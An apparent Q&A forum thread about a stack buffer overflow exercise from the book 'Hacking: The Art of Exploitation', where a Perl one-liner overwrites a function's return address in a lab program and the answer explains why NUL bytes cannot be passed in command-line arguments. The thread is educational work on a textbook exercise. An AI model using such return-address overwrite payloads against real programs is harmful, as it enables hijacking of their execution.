Writing to an address starting with 0x00 with a Perl script

Question

Reading the book "Hacking - The Art of Exploitation"; I am following the writer as he changes the execution flow by overflowing the stack and changing the return address of a function. (Specifically, page 135-136) He manages to do this with a Perl script, entering the return address as a command line argument 10 times:

$ ./auth_overflow2 $(perl -e 'print "\xbf\x84\x04\x08"x10')

where 0x080484bf is the return address.

I'm trying to do the same, but my return address starts with 0x00. Replacing \x08 with \x00, the null character becomes omitted, therefore address I want to enter is shifted by a byte in the memory map. How can I work around this?

Answer 1

Command line-arguments are NUL-terminated strings. Therefore, you can't pass a string containing a NUL. It would be taken to be the end of the string.

$ perl -e'system("echo", "abc\x00def", "ghi\x00jkl");'
abc ghi

Knowing this, the shell is stripping out the NULs when building the argument.

$ perl -e'printf "%v02X\n", $_ for @ARGV' "$( perl -e'print "\xbf\x84\x04\x08" x 5' )"
BF.84.04.08.BF.84.04.08.BF.84.04.08.BF.84.04.08.BF.84.04.08

$ perl -e'printf "%v02X\n", $_ for @ARGV' "$( perl -e'print "\xbf\x84\x04\x00" x 5' )"
BF.84.04.BF.84.04.BF.84.04.BF.84.04.BF.84.04

auth_overflow2 should be modified to take an escaped form of the address, e.g. the address in hex.